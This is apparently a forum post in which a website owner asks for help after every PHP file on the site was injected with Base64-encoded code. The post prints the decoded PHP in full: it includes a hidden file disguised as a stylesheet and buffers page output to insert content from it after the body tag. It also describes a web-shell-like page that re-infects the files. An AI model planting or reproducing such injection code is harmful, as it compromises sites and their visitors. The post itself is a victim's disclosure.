All the php files on my site have been injected with Base64-encoded text that translates to
if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('/home/jlgam4/public_html/mystiquestudios/forum/Themes/default/images/bbc/style.css.php')){include_once('/home/jlgam4/public_html/mystiquestudios/forum/Themes/default/images/bbc/style.css.php');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode($d){$f=ord(substr($d,3,1));$h=10;$e=0;if($f&4){$e=unpack('v',substr($d,10,2));$e=$e[1];$h+=2+$e;}if($f&8){$h=strpos($d,chr(0),$h)+1;}if($f&16){$h=strpos($d,chr(0),$h)+1;}if($f&2){$h+=2;}$u=gzinflate(substr($d,$h));if($u===FALSE){$u=$d;}return $u;}}function dgobh($b){Header('Content-Encoding: none');$c=gzdecode($b);if(preg_match('/\<body/si',$c)){return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$c);}else{return gml().$c;}}ob_start('dgobh');}}}
I had a look at the style.css.php file and it has been encoded multiple times. I finally got it all decoded but I don't know what it all means.
I removed the code from all my pages and deleted the style.css.php but when I went to change my theme in my profile it came up with this page that showed details about my server and a list of directory's as well as all files that had been reinjected with the code above and the style.css.php file reappeared.. I’m stuck, I don't know what to do.
Plz help.
